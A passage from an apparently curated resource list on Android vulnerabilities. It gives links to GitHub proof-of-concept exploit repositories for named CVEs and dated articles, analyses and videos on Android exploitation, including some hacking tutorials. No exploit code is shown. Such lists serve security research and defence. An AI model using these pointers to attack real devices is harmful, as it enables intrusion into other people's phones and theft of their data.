[m-mullins/cve-2016-8655_android](https://github.com/m-mullins/cve-2016-8655_android) Android attempt at PoC CVE-2016-8655 - [**9**星][5y] [C] [ele7enxxh/fakeodex](https://github.com/ele7enxxh/fakeodex) modify field(modWhen, crc) in android odex file;安卓APP“寄生兽”漏洞 - [**9**星][4y] [Java] [heeeeen/cve-2014-7911poc](https://github.com/heeeeen/cve-2014-7911poc) - [**9**星][2y] [Java] [lanrat/tethr](https://github.com/lanrat/tethr) Android Tethering Provisioning Check Bypass (CVE-2017-0554) - [**8**星][3y] [C] [timwr/cve-2013-6282](https://github.com/timwr/cve-2013-6282) CVE-2013-6282 proof of concept for Android - [**8**星][2m] [C++] [amrashraf/androshield](https://github.com/amrashraf/androshield) An ASP.NET web application that responsible of detecting and reporting vulnerabilities in android applications by static and dynamic analysis methodologies. - [**6**星][3y] [Java] [ele7enxxh/cve-2014-7911](https://github.com/ele7enxxh/cve-2014-7911) - [**6**星][2m] [Java] [ioactive/aosp-downloadproviderdbdumper](https://github.com/ioactive/aosp-downloadproviderdbdumper) PoC Exploiting SQL Injection in Android's Download Provider (CVE-2018-9493) - [**6**星][2m] [Java] [ioactive/aosp-downloadproviderheadersdumper](https://github.com/ioactive/aosp-downloadproviderheadersdumper) PoC Exploiting Headers Disclosure in Android's Download Provider (CVE-2018-9546) - [**6**星][2y] [Java] [michalbednarski/reparcelbug](https://github.com/michalbednarski/reparcelbug) CVE-2017-0806 PoC (Android GateKeeperResponse writeToParcel/createFromParcel mismatch) - [**5**星][6y] [PHP] [thomascannon/android-cve-2010-4804](https://github.com/thomascannon/android-cve-2010-4804) Android Data Stealing Vulnerability - [**3**星][1y] [Java] [alexeyzatsepin/cp-tester](https://github.com/alexeyzatsepin/cp-tester) Android application for finding vulnerabilities in all of content providers based on SQLite databases on your device with sql-injection - [**3**星][7y] [C] [hiikezoe/libfb_mem_exploit](https://github.com/hiikezoe/libfb_mem_exploit) CVE-2013-2596 exploit for android - [**3**星][6y] [Py] [niejuhu/pocs](https://github.com/niejuhu/pocs) Android漏洞验证程序 - [**2**星][3y] [Py] [kr1shn4murt1/exploit-ms-17-010](https://github.com/kr1shn4murt1/exploit-ms-17-010) Exploit para vulnerabilidad ms17-010 desde android - [**2**星][6y] [yangwenbo/resetpin](https://github.com/yangwenbo/resetpin) POC of Android Fragment Injection vulnerability, about reset PIN - [**1**星][3m] [Py] [brant-ruan/idf4apev](https://github.com/brant-ruan/idf4apev) Integrated Detection Framework for Android's Privilege Escalation Vulnerabilites ### <a id="d5f45ceee87e1d68df9fe75801285e9e"></a>文章 - 2020.02 [venus] [Android 蓝牙子系统 "BlueFrag" 漏洞分析(CVE-2020-0022)](https://paper.seebug.org/1121/) - 2020.02 [nsfocus] [【威胁通告】安卓蓝牙组件高危漏洞(CVE-2020-0022)](http://blog.nsfocus.net/cve-2020-0022/) - 2020.02 [insinuator] [Critical Bluetooth Vulnerability in Android (CVE-2020-0022)](https://insinuator.net/2020/02/critical-bluetooth-vulnerability-in-android-cve-2020-0022/) - 2020.01 [LoiLiangYang] [Hack Facebook Account on Android with Browser Exploitation Framework (Cybersecurity)](https://www.youtube.com/watch?v=HIYcqZqqpS4) - 2019.12 [aliyun] [Android内核漏洞学习——CVE-2014-3153分析(2)](https://xz.aliyun.com/t/6948) - 2019.12 [4hou] [谷歌修复CVE-2019-2232安卓DoS漏洞](https://www.4hou.com/vulnerable/22055.html) - 2019.12 [pangu] [盘古实验室报告两个Android安全漏洞获Google致谢](https://blog.pangu.io/?p=66) - 2019.12 [aliyun] [Android内核漏洞学习——CVE-2014-3153分析(1)](https://xz.aliyun.com/t/6907) - 2019.12 [HackersOnBoard] [DEF CON 27 - Bug Finding And Exploit Techniques On File Transfer App Of All Top Android Vendors](https://www.youtube.com/watch?v=9PYYnl0FR1I) - 2019.12 [4hou] [StrandHogg安卓漏洞分析](https://www.4hou.com/vulnerable/21903.html) - 2019.12 [aliyun] [CVE-2019-2215—android内核binder漏洞分析(2)](https://xz.aliyun.com/t/6853) - 2019.11 [secplicity] [Android Screen Capture Vulnerabilities](https://www.secplicity.org/2019/11/25/android-screen-capture-vulnerabilities/) - 2019.11 [lookout] [Strandhogg vulnerability allows attackers to circumvent Android OS safeguards](https://blog.lookout.com/strandhogg-vulnerability-allows-attackers-to-circumvent-android-os-safeguards) - 2019.11 [googleprojectzero] [Bad Binder: Android In-The-Wild Exploit](https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html) - 2019.11 [freebuf] [谷歌三星安卓摄像头应用含高危漏洞变身监控器,影响数亿设备(PoC)](https://www.freebuf.com/vuls/220644.html) - 2019.11 [aliyun] [Android内核漏洞——初探](https://xz.aliyun.com/t/6715) - 2019.11 [secplicity] [Android Vulnerability: NFC and Android Beam](https://www.secplicity.org/2019/11/06/android-vulnerability-nfc-and-android-beam/) - 2019.11 [riusksk] [Android应用逻辑漏洞半自动化挖掘思路](http://riusksk.me/2019/11/02/Jandroid:半自动化Android应用逻辑漏洞挖掘/) - 2019.10 [nightwatchcybersecurity] [NFC Beaming Bypasses Security Controls in Android [CVE-2019-2114]](https://wwws.nightwatchcybersecurity.com/2019/10/24/nfc-beaming-bypasses-security-controls-in-android-cve-2019-2114/) - 2019.10 [4hou] [利用 Android WhatsApp App GIF 库的 Double-Free 漏洞实现 RCE](https://www.4hou.com/vulnerable/21137.html) - 2019.10 [Sophos] [Android zero-day exploit - what you need know - Naked Security Live](https://www.youtube.com/watch?v=oZVyQiSEKko) - 2019.10 [4hou] [Android Binder Driver UAF 漏洞实现 Root 提权分析(CVE-2019-2215)](https://www.4hou.com/info/news/21060.html) - 2019.10 [Sophos] [Android zero-day exploit: what you need know - Naked Security Live](https://www.youtube.com/watch?v=6QNIQxpGd9U) - 2019.10 [venus] [Examining and exploiting Android vendor binder services:谁偷了我的虚表?](https://paper.seebug.org/1051/) - 2019.10 [trendmicro] [This Week in Security News: How a GIF Can Hack Your Android and Vulnerabilities That Could Put Hospital Networks at Risk](https://blog.trendmicro.com/this-week-in-security-news-how-a-gif-can-hack-your-android-and-vulnerabilities-that-could-put-hospital-networks-at-risk/) - 2019.09 [LoiLiangYang] [Android Mobile Device Post Exploitation (Cyber-Security)](https://www.youtube.com/watch?v=ubxtIwJXKmk) - 2019.09 [PositiveTechnologies] [Underestimated vulnerabilities of modern Android applications](https://www.youtube.com/watch?v=LrshHwrZMcU) - 2019.09 [t00ls] [安卓应用漏洞挖掘分享-Ayound](https://www.t00ls.net/articles-52920.html) - 2019.09 [secplicity] [Unpatched 0-Day Android Vulnerability](https://www.secplicity.org/2019/09/14/unpatched-0-day-android-vulnerability/) - 2019.09 [4hou] [6个月没有补丁的Android 0 day权限提升漏洞](https://www.4hou.com/info/news/20186.html) - 2019.09 [aliyun] [CVE-2017-13253 :Android Drm服务 堆溢出漏洞](https://xz.aliyun.com/t/6144) - 2019.08 [freebuf] [挖洞经验 | 发现Outlook安卓版本APP跨站漏洞CVE-2019-1105](https://www.freebuf.com/vuls/211091.html) - 2019.08 [aliyun] [CVE-2018-9539:特权Android服务中的Use-After-Free](https://xz.aliyun.com/t/5833) - 2019.07 [freebuf] [Android出现新漏洞,可在无权限的情况下利用传感器获取语音信息](https://www.freebuf.com/news/208700.html) - 2019.07 [freebuf] [挖洞经验 | 看我如何发现微软Outlook for Android移动应用的XSS漏洞](https://www.freebuf.com/vuls/208038.html) - 2019.07 [lightbluetouchpaper] [The lifetime of an Android API vulnerability](https://www.lightbluetouchpaper.org/2019/07/10/the-lifetime-of-an-android-api-vulnerability/) - 2019.06 [JosephDelgadillo] [Learn System Hacking E20: Exploiting Android and iOS Devices with Venom](https://www.youtube.com/watch?v=mRSJeh7EyOQ) - 2019.06 [antid0te] [ARM64 Reverse Engineering and Android/Linux Exploitation Training (October 2019)](http://antid0te.com/blog/19-10-07-arm64-reverse-engineering-exploitation-singapore.html) - 2019.06 [knownsec404team] [Linux Kernel: the ROP Exploit of Stack Overflow in Android Kernel](https://medium.com/p/87aa8eda770d) - 2019.06 [venus] [Linux Kernel: the ROP Exploit of Stack Overflow in Android Kernel](https://paper.seebug.org/947/) - 2019.05 [4hou] [Android和iOS设备的指纹识别技术漏洞曝光,该漏洞几乎不可控!](https://www.4hou.com/vulnerable/18210.html) - 2019.05 [arxiv] [[1905.09352] Hey Google, What Exactly Do Your Security Patches Tell Us? A Large-Scale Empirical Study on Android Patched Vulnerabilities](https://arxiv.org/abs/1905.09352) - 2019.05 [quarkslab] [Android Application Diffing: CVE-2019-10875 Inspection](https://blog.quarkslab.com/android-application-diffing-cve-2019-10875-inspection.html) - 2019.04 [ioactive] [Multiple Vulnerabilities in Android’s Download Provider (CVE-2018-9468, CVE-2018-9493, CVE-2018-9546)](https://ioactive.com/multiple-vulnerabilities-in-androids-download-provider-cve-2018-9468-cve-2018-9493-cve-2018-9546/) - 2019.03 [aliyun] [CVE-2019-2000—android内核binder中fdget优化产生的UAF漏洞的分析](https://xz.aliyun.com/t/4494) - 2019.03 [int0x33] [Day 82: Hunting for Vulnerabilities in Android Apps with Burp and APK Tools](https://medium.com/p/8b84bc189603) - 2019.03 [arxiv] [[1903.05170] BenchPress: Analyzing Android App Vulnerability Benchmark Suites](https://arxiv.org/abs/1903.05170) - 2019.03 [MastersInEthicalHacking] [Vulnerability Scanning Using Android](https://www.youtube.com/watch?v=3uk11wrbJLQ) - 2019.03 [aliyun] [简单的安卓漏洞挖掘(二)](https://xz.aliyun.com/t/4269) - 2019.03 [] [The ‘Waterdrop’ in Android: A Binder Kernel Vulnerability](http://blogs.360.cn/post/Binder_Kernel_Vul_EN.html) - 2019.03 [NullByte] [Scan Websites for Vulnerabilities using Kali Linux on Any Android Device [Tutorial]](https://www.youtube.com/watch?v=TCj645oL0wo) - 2019.03 [freebuf] [如何使用未Root的Android手机扫描网站漏洞](https://www.freebuf.com/sectool/196167.html) - 2019.02 [googleblog] [Android Security Improvement update: Helping developers harden their apps, one thwarted vulnerability at a time](https://android-developers.googleblog.com/2019/02/android-security-improvement-update.html) - 2019.02 [aliyun] [简单的安卓漏洞挖掘学习(一)](https://xz.aliyun.com/t/4197) - 2019.02 [talosintelligence] [Rakuten Viber Android Secret Chats Information Disclosure Vulnerability](https://talosintelligence.com/vulnerability_reports/TALOS-2018-0655) - 2019.01 [securitygossip] [Dazed Droids: A Longitudinal Study of Android Inter-App Vulnerabilities](https://securitygossip.com/blog/2019/01/16/dazed-droids-a-longitudinal-study-of-android-inter-app-vulnerabilities/) - 2019.01 [sjtu] [Dazed Droids: A Longitudinal Study of Android Inter-App Vulnerabilities](https://loccs.sjtu.edu.cn/gossip/blog/2019/01/16/dazed-droids-a-longitudinal-study-of-android-inter-app-vulnerabilities/) - 2019.01 [vulnerability0lab] [Microsoft Skype v8.34 Android Consumer Version - Authentication Bypass Vulnerability CVE-2019-0622](https://www.youtube.com/watch?v=2AUxh2M1EPg) - 2018.12 [talosintelligence] [Telegram Android Secret Chats Information Disclosure Vulnerability](https://talosintelligence.com/vulnerability_reports/TALOS-2018-0654) - 2018.12 [pediy] [[原创](Android Root)CVE-2017-7533 漏洞分析和复现](https://bbs.pediy.com/thread-248481.htm) - 2018.12 [talosintelligence] [Signal Messenger Android self deleting messages Information Disclosure Vulnerability](https://talosintelligence.com/vulnerability_reports/TALOS-2018-0656) - 2018.11 [4hou] [Android系统中通过RSSI广播泄漏敏感数据的漏洞详情披露(CVE-2018-9581)](http://www.4hou.com/vulnerable/14657.html) - 2018.11 [nightwatchcybersecurity] [Sensitive Data Exposure via RSSI Broadcasts in Android OS [CVE-2018-9581]](https://wwws.nightwatchcybersecurity.com/2018/11/11/cve-2018-9581/) - 2018.11 [nightwatchcybersecurity] [Android系统电池信息广播可泄漏敏感数据(CVE-2018-15835)](https://wwws.nightwatchcybersecurity.com/2018/11/11/cve-2018-15835/) - 2018.11 [4hou] [影响Android多个高权限服务的严重漏洞详情披露(CVE-2018-9411)](http://www.4hou.com/vulnerable/14456.html) - 2018.11 [zimperium] [CVE-2018-9539: Use-after-free vulnerability in privileged Android service](https://blog.zimperium.com/cve-2018-9539-use-free-vulnerability-privileged-android-service/) - 2018.11 [aliyun] [CVE-2018-9411:多个高权限Android服务中的新关键漏洞](https://xz.aliyun.com/t/3164) - 2018.10 [pediy] [[翻译]Android 8.1 默认打印服务的中间人攻击漏洞披露](https://bbs.pediy.com/thread-247566.htm) - 2018.10 [zimperium] [CVE-2018-9411: 多个高权限的Android服务的严重漏洞](https://blog.zimperium.com/cve-2018-9411-new-critical-vulnerability-multiple-high-privileged-android-services/) - 2018.09 [NorthSec] [Kristina Balaam - Evading Vulnerability Exploitation Through Secure Android Development](https://www.youtube.com/watch?v=S0a3EtlB824) - 2018.09 [4hou] [完美越狱iOS12后 阿里安全潘多拉实验室再曝Linux存严重漏洞:9成安卓手机可被控制](http://www.4hou.com/info/news/13752.html) - 2018.09 [4hou] [Facebook安卓应用任意Javascript代码执行漏洞详情披露](http://www.4hou.com/vulnerable/13645.html) - 2018.09 [aliyun] [Android OS 中通过 WiFi 广播泄漏敏感数据(CVE-2018-9489)](https://xz.aliyun.com/t/2751) - 2018.09 [360] [Facebook安卓客户端任意Javascript代码执行漏洞分析](https://www.anquanke.com/post/id/159648/) - 2018.09 [googleprojectzero] [OATmeal on the Universal Cereal Bus: Exploiting Android phones over USB](https://googleprojectzero.blogspot.com/2018/09/oatmeal-on-universal-cereal-bus.html) - 2018.09 [4hou] [故意为之?安卓9.0以前的全部系统版本均受到“API-breaking”漏洞的影响](http://www.4hou.com/vulnerable/13460.html) - 2018.08 [nightwatchcybersecurity] [Sensitive Data Exposure via WiFi Broadcasts in Android OS [CVE-2018-9489]](https://wwws.nightwatchcybersecurity.com/2018/08/29/sensitive-data-exposure-via-wifi-broadcasts-in-android-os-cve-2018-9489/) - 2018.08 [venus] [Android 蓝牙组件漏洞连连看](https://paper.seebug.org/666/) - 2018.08 [CPP] [Android Operating System: One Potential Vulnerability per 4000 Lines of C++ Code](https://medium.com/p/85041585927b) - 2018.08 [360] [Android用户字典侧信道信息泄露漏洞(CVE-2018-9375)](https://www.anquanke.com/post/id/154267/) - 2018.08 [ioactive] [Discovering and Exploiting a Vulnerability in Android’s Personal Dictionary (CVE-2018-9375)](https://ioactive.com/discovering-and-exploiting-a-vulnerability-in-androids-personal-dictionary/) - 2018.07 [4hou] [Quarkslab发现的三个Android蓝牙组件漏洞详情](http://www.4hou.com/vulnerable/12810.html) - 2018.07 [arxiv] [[1807.11840] Open Source Android Vulnerability Detection Tools: A Survey](https://arxiv.org/abs/1807.11840) - 2018.07 [pediy] [[原创]CVE-2015-3636(pingpong root) android内核 UAF漏洞分析](https://bbs.pediy.com/thread-230298.htm) - 2018.07 [quarkslab] [A Story About Three Bluetooth Vulnerabilities in Android](https://blog.quarkslab.com/a-story-about-three-bluetooth-vulnerabilities-in-android.html) - 2018.07 [360] [RAMpage攻击:再次利用安卓RowHammer漏洞](https://www.anquanke.com/post/id/150881/) - 2018.07 [hackers] [Metasploit Basics, Part 13: Exploiting Android Mobile Devices](https://www.hackers-arise.com/single-post/2018/07/06/Metasploit-Basics-Part-13-Exploiting-Android-Mobile-Devices) - 2018.07 [4hou] [RAMpage攻击:再次利用安卓DRAM RowHammer漏洞](http://www.4hou.com/vulnerable/12343.html) - 2018.07 [ms509] [Bundle风水——Android序列化与反序列化不匹配漏洞详解](http://www.ms509.com/2018/07/03/bundle-mismatch/) - 2018.06 [qq] [【游戏漏洞】简单破解安卓手游基础](http://gslab.qq.com/article-512-1.html) - 2018.06 [zimperium] [RAMpage: The Latest Rowhammer-esque Android Vulnerability](https://blog.zimperium.com/rampage-latest-rowhammer-esque-android-vulnerability/) - 2018.06 [arxiv] [[1806.09059] Are Free Android App Security Analysis Tools Effective in Detecting Known Vulnerabilities?](https://arxiv.org/abs/1806.09059) - 2018.06 [freebuf] [APP漏洞赏金项目之安卓APP应用程序测试(一)](http://www.freebuf.com/articles/terminal/174483.html) - 2018.06 [NetworkHeros] [Hack with zANTI Vulnerability Assessment & MITM (Android Hacking) #Part-II](https://www.youtube.com/watch?v=aGVIRbTeQAs) - 2018.06 [NetworkHeros] [Hack with zANTI 3.18 : Vulnerability Assessment & MITM (Android Hacking) #Part-1](https://www.youtube.com/watch?v=Xl3rgXEwbp8) - 2018.05 [aliyun] [Bundle风水——Android序列化与反序列化不匹配漏洞详解](https://xz.aliyun.com/t/2364) - 2018.05 [nightwatchcybersecurity] [Android OS Didn’t use FLAG_SECURE for Sensitive Settings [CVE-2017-13243]](https://wwws.nightwatchcybersecurity.com/2018/05/24/android-os-didnt-use-flag_secure-for-sensitive-settings-cve-2017-13243/) - 2018.05 [HackerSploit] [Android Hacking With zANTI - MITM & Vulnerability Assessment](https://www.youtube.com/watch?v=_P4Q__ZSFUo) - 2018.05 [360] [DEFCON CHINA议题解读 | 通用安卓平台路径穿越漏洞的挖掘与利用](https://www.anquanke.com/post/id/145005/) - 2018.05 [freebuf] [安卓、iOS双平台现重大安全漏洞,微博、网易云音乐等大型应用均受影响](http://www.freebuf.com/news/171914.html) - 2018.05 [pentestingexperts] [How to Hack Android Devices Using the StageFright Vulnerability](http://www.pentestingexperts.com/how-to-hack-android-devices-using-the-stagefright-vulnerability/) - 2018.04 [360] [Android内核漏洞调试:编译android4.4.4源码和内核](https://www.anquanke.com/post/id/105994/) - 2018.04 [layerone] [Training Spotlight: Android Reverse Engineering for Bug Bounties and Vulnerability Hunting](https://www.layerone.org/training-spotlight-android-reverse-engineering-for-bug-bounties-and-vulnerability-hunting/) - 2018.04 [pediy] [[原创]CVE-2017-13258 Android 蓝牙BNEP漏洞分析](https://bbs.pediy.com/thread-226004.htm) - 2018.03 [pediy] [[分享]CVE-2017-13253 Android Drm服务 堆溢出漏洞调试分析](https://bbs.pediy.com/thread-225398.htm) - 2018.03 [quarkslab] [2018年3月安全公告中的Android蓝牙漏洞详情](https://blog.quarkslab.com/android-bluetooth-vulnerabilities-in-the-march-2018-security-bulletin.html) - 2018.03 [360] [CVE-2017-13253:多个Android DRM服务中存在缓冲区溢出漏洞](https://www.anquanke.com/post/id/101552/) - 2018.03 [zimperium] [Android DRM服务缓冲区溢出漏洞(CVE-2017-13253)](https://blog.zimperium.com/cve-2017-13253-buffer-overflow-multiple-android-drm-services/) - 2018.03 [NDSSSymposium] [NDSS2018 - Automated Generation of Event-Oriented Exploits in Android Hybrid Apps](https://www.youtube.com/watch?v=O73Lua_McO0) - 2018.03 [infosecinstitute] [How to Hack Android Devices Using the StageFright Vulnerability](http://resources.infosecinstitute.com/hack-android-devices-using-stagefright-vulnerability/) - 2018.03 [TechnicalMujeeb] [how to find android apps vulnerabilities in Termux](https://www.youtube.com/watch?v=td2wEobEzQ0) - 2018.03 [freebuf] [安卓端渗透工具DVHMA:自带漏洞的混合模式APP](http://www.freebuf.com/news/163057.html) - 2018.03 [nightwatchcybersecurity] [Content Injection in Samsung Display Solutions Application for Android [CVE-2018-6019]](https://wwws.nightwatchcybersecurity.com/2018/03/01/content-injection-in-samsung-display-solutions-application-for-android-cve-2018-6019/) - 2018.02 [insinuator] [AndroTickler: Tickling Vulnerabilities out of Android Apps](https://insinuator.net/2018/02/androtickler-tickling-vulnerabilities-out-of-android-apps/) - 2018.02 [HITCON] [[HITCON CMT 2017] R2D104 - 温瀚翔 & 王曉東 - Challenge Impossible -- Multiple Exploit On Android](https://www.youtube.com/watch?v=vld3_lxhK9w) - 2018.01 [freebuf] [CVE-2017-8890漏洞分析与利用(Root Android 7.x)](http://www.freebuf.com/articles/terminal/160041.html) - 2018.01 [qq] [【游戏漏洞】安卓手游逆向必须基础](http://gslab.qq.com/article-382-1.html) - 2018.01 [freebuf] [关于Android平台WebView控件存在跨域高危漏洞的安全公告](http://www.freebuf.com/articles/terminal/159787.html) - 2018.01 [attify] [Advanced Android and iOS Hands-on Exploitation training](https://blog.attify.com/advanced-android-and-ios-hands-on-exploitation-training/) - 2018.01 [4hou] [Janus安卓应用签名绕过漏洞(CVE-2017-13156),允许攻击者修改合法应用](http://www.4hou.com/info/news/9536.html) - 2018.01 [qq] [【游戏漏洞】安卓U3D逆向从Assembly-CSharp到il2cpp](http://gslab.qq.com/article-381-1.html) - 2018.01 [retme] [The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel (slides)](http://retme.net/index.php/2018/01/02/unconventional-UAF-in-kernel.html) - 2017.12 [360] [Tethr:安卓网络共享服务开通状态检查绕过漏洞(CVE-2017-0554)](https://www.anquanke.com/post/id/92780/) - 2017.12 [lanrat] [Tethr: Android Tethering Provisioning Check Bypass (CVE-2017-0554)](https://lanrat.com/tethr/) - 2017.12 [ms509] [Android蓝牙远程命令执行漏洞利用实践 exploit优化](http://www.ms509.com/2017/12/22/android-blueborne2/) - 2017.12 [4hou] [CVE-2017-17551:Dolphin浏览器漏洞之利用安卓备份恢复特性](http://www.4hou.com/vulnerable/9373.html) - 2017.12 [4hou] [安卓新漏洞:攻击者可任意修改App](http://www.4hou.com/info/news/9278.html) - 2017.12 [360] [安卓系统Janus漏洞分析专题](https://www.anquanke.com/post/id/90395/) - 2017.12 [freebuf] [独家分析:安卓“Janus”漏洞的产生原理及利用过程](http://www.freebuf.com/articles/terminal/156862.html) - 2017.12 [360] [独家分析:安卓“Janus”漏洞的产生原理及利用过程](https://www.anquanke.com/post/id/90075/) - 2017.12 [360] [ParseDroid漏洞:针对Android开发者和安全分析人员](https://www.anquanke.com/post/id/89557/) - 2017.12 [esecurityplanet] [Google Patches Android for 47 Vulnerabilities in Final Update for 2017](https://www.esecurityplanet.com/mobile-security/google-patches-android-for-47-vulnerabilities-in-final-update-for-2017.html) - 2017.11 [hackingarticles] [Android Mobile Exploitation with Evil-Droid](http://www.hackingarticles.in/android-mobile-exploitation-evil-droid/) - 2017.11 [4hou] [一个漏洞泄露安卓用户的声音](http://www.4hou.com/info/news/8657.html) - 2017.11 [freebuf] [Android Media Projection服务漏洞深度剖析](http://www.freebuf.com/articles/terminal/154704.html) - 2017.11 [aliyun] [Android蓝牙远程命令执行漏洞利用实践: Exploit优化](https://xz.aliyun.com/t/1521) - 2017.11 [4hou] [Android BlueBorne (CVE-2017-0781)漏洞分析和利用](http://www.4hou.com/mobile/8496.html) - 2017.11 [TechnicalMujeeb] [A-RAt exploit Tool Remote Access Android using Termux App.](https://www.youtube.com/watch?v=bzYsfe6WT7M) - 2017.11 [jesux] [Android 6.0.1 蓝牙RCE 漏洞 BlueBorne(CVE-2017-0781)](https://jesux.es/exploiting/blueborne-android-6.0.1-english/) - 2017.11 [ms509] [Android蓝牙远程命令执行漏洞利用实践:从PoC到exploit](http://www.ms509.com/2017/11/14/blueborne/) - 2017.11 [4hou] [11月安卓系统漏洞小结:31个不得不修复的漏洞](http://www.4hou.com/info/news/8374.html) - 2017.11 [jesux] [BlueBorne RCE en Android 6.0.1 (CVE-2017-0781)](https://jesux.es/exploiting/blueborne-android-6.0.1/) - 2017.10 [venus] [Android蓝牙远程命令执行漏洞利用实践:从PoC到Exploit](https://paper.seebug.org/430/) - 2017.10 [aliyun] [Android蓝牙远程命令执行漏洞利用实践:从PoC到Exploit](https://xz.aliyun.com/t/6) - 2017.10 [freebuf] [Google Play Store启动漏洞赏金计划保护Android应用](http://www.freebuf.com/news/151363.html) - 2017.10 [armis] [BlueBorne on Android: Exploiting an RCE Over the Air](https://www.armis.com/blueborne-on-android-exploiting-rce-over-the-air/) - 2017.09 [esecurityplanet] [Google Android and Apple iOS Update for Critical Wi-Fi Vulnerabilities](https://www.esecurityplanet.com/mobile-security/google-android-and-apple-ios-update-for-critical-wi-fi-vulnerabilities.html) - 2017.09 [360] [ZNIU:首款利用Dirty COW漏洞的Android恶意软件](https://www.anquanke.com/post/id/86930/) - 2017.09 [freebuf] [Android Message APP 拒绝服务漏洞(CVE-2017-0780)分析与利用](http://www.freebuf.com/vuls/147601.html) - 2017.09 [360] [CVE-2017-0780:拒绝服务漏洞可以导致Android信息应用崩溃](https://www.anquanke.com/post/id/86863/) - 2017.09 [pediy] [[原创] Android内核提权cve-2014-3153研究笔记](https://bbs.pediy.com/thread-221235.htm) - 2017.09 [4hou] [CVE-2017-0780:一张GIF图,让最新版Android短信应用无限崩溃](http://www.4hou.com/vulnerable/7595.html) - 2017.09 [trendmicro] [CVE-2017-0780: DoS 漏洞可导致 Android Messages App 崩溃](https://blog.trendmicro.com/trendlabs-security-intelligence/cve-2017-0780-denial-service-vulnerability-android-messages-app/) - 2017.09 [4hou] [这款开源“神器”,可以找出Android设备最底层的Bootloader漏洞](http://www.4hou.com/info/news/7551.html) - 2017.08 [vulnerability0lab] [Android Studio 1-4 & 2.3.3 - Manual Local Buffer Overflow Vulnerability](https://www.youtube.com/watch?v=cdXChK64WLc) - 2017.08 [qq] [【漏洞分析】浅析android手游lua脚本的加密与解密](http://gslab.qq.com/article-294-1.html) - 2017.08 [cylance] [Broadpwn: The Mobile Exploit for Android and iPhones](https://www.cylance.com/en_us/blog/broadpwn-the-mobile-exploit-for-android-and-iphones.html) - 2017.08 [360] [Android内核漏洞利用技术实战:环境搭建&栈溢出实战](https://www.anquanke.com/post/id/86617/) - 2017.08 [trendmicro] [Android, Linux 系统F2FS 文件系统漏洞会导致内存崩溃](https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerability-f2fs-file-system-leads-memory-corruption-android-linux/) - 2017.08 [esecurityplanet] [Google Patches Android for 49 Vulnerabilities in August Update](https://www.esecurityplanet.com/mobile-security/google-patches-android-for-49-vulnerabilities-in-august-update.html) - 2017.08 [arxiv] [[1708.02380] Ghera: A Repository of Android App Vulnerability Benchmarks](https://arxiv.org/abs/1708.02380) - 2017.08 [4hou] [Broadcom Wi-Fi芯片被爆漏洞,数百万台的Android、iOS设备遭殃](http://www.4hou.com/technology/6930.html) - 2017.07 [pangu] [盘古实验室报告两个Android安全漏洞获Google致谢](http://blog.pangu.io/%e7%9b%98%e5%8f%a4%e5%ae%9e%e9%aa%8c%e5%ae%a4%e6%8a%a5%e5%91%8a%e4%b8%a4%e4%b8%aaandroid%e5%ae%89%e5%85%a8%e6%bc%8f%e6%b4%9e%e8%8e%b7google%e8%87%b4%e8%b0%a2/) - 2017.07 [pangu] [盘古实验室报告两个Android安全漏洞获Google致谢](http://blog.pangu.io/%e7%9b%98%e5%8f%a4%e5%ae%9e%e9%aa%8c%e5%ae%a4%e6%8a%a5%e5%91%8a%e4%b8%a4%e4%b8%aaandroid%e5%ae%89%e5%85%a8%e6%bc%8f%e6%b4%9e%e8%8e%b7google%e8%87%b4%e8%b0%a2/) - 2017.06 [trendmicro] [June’s Android Security Bulletin Address Critical Vulnerabilities in Media Framework and Qualcomm Components](https://blog.trendmicro.com/trendlabs-security-intelligence/junes-android-security-bulletin-address-critical-vulnerabilities-media-framework-qualcomm-components/) - 2017.06 [esecurityplanet] [Google Patches Android and Chrome for Security Vulnerabilities](https://www.esecurityplanet.com/mobile-security/google-patches-android-and-chrome-for-security-vulnerabilities.html) - 2017.05 [4hou] [Google知道Android漏洞正在被勒索软件滥用,但它近期并不打算修复](http://www.4hou.com/info/news/4720.html) - 2017.05 [freebuf] [关于Android应用程序漏洞的防护措施](http://www.freebuf.com/articles/terminal/134018.html) - 2017.05 [ionize] [Android Exploit Development with the Android Open Source Project Toolchain](https://ionize.com.au/android-exploit-development-android-open-source-project-toolchain/) - 2017.05 [esecurityplanet] [Google Patches 17 Critical Vulnerabilities in Android May Security Update](https://www.esecurityplanet.com/mobile-security/google-patches-17-critical-vulnerabilities-in-android-may-security-update.html) - 2017.04 [pediy] [[翻译]基于jemalloc的Android漏洞利用技巧----CENSUS](https://bbs.pediy.com/thread-217285.htm) - 2017.04 [360] [基于jemalloc的Android漏洞利用技巧----CENSUS](https://www.anquanke.com/post/id/85982/) - 2017.04 [freebuf] [一款Android漏洞测试套件 – AndroidVTS](http://www.freebuf.com/sectool/132932.html) - 2017.04 [trendmicro] [April Android Security Bulletin Addresses Critical H.264 and H.265 Decoder Vulnerabilities](https://blog.trendmicro.com/trendlabs-security-intelligence/april-android-security-bulletin-addresses-critical-h-264-h-265-decoder-vulnerabilities/) - 2017.04 [freebuf] [Android安全开发之启动私有组件漏洞浅谈](http://www.freebuf.com/articles/terminal/131356.html) - 2017.04 [arxiv] [[1704.03356] An Empirical Study on Android-related Vulnerabilities](https://arxiv.org/abs/1704.03356) - 2017.04 [4hou] [Android安全开发之启动私有组件漏洞浅谈](http://www.4hou.com/technology/4134.html) - 2017.04 [aliyun] [Android安全开发之启动私有组件漏洞浅谈](https://xz.aliyun.com/t/1201) - 2017.04 [freebuf] [iOS 10.3.1修复的那个WiFi芯片漏洞,也影响到了数百万Android手机](http://www.freebuf.com/news/131295.html) - 2017.03 [trendmicro] [Mediaserver Vulnerabilities Highlight Android’s March Security Bulletin](https://blog.trendmicro.com/trendlabs-security-intelligence/mediaserver-vulnerabilities-highlight-androids-march-security-bulletin/) - 2017.03 [venus] [Exploiting Android S-Boot: Getting Arbitrary Code Exec in the Samsung Bootloader (1/2)](https://paper.seebug.org/237/) - 2017.02 [hexdetective] [Exploiting Android S-Boot: Getting Arbitrary Code Exec in the Samsung Bootloader (1/2)](http://hexdetective.blogspot.com/2017/02/exploiting-android-s-boot-getting.html) - 2017.02 [secvul] [Android漏洞checklist](https://secvul.com/topics/571.html) - 2017.02 [pentestlab] [Android WebView Vulnerabilities](https://pentestlab.blog/2017/02/12/android-webview-vulnerabilities/) - 2017.02 [freebuf] [Zimperium开始悬赏Android和iPhone漏洞利用代码](http://www.freebuf.com/news/126231.html) - 2017.02 [freebuf] [Android是今年的漏洞之王?CVE 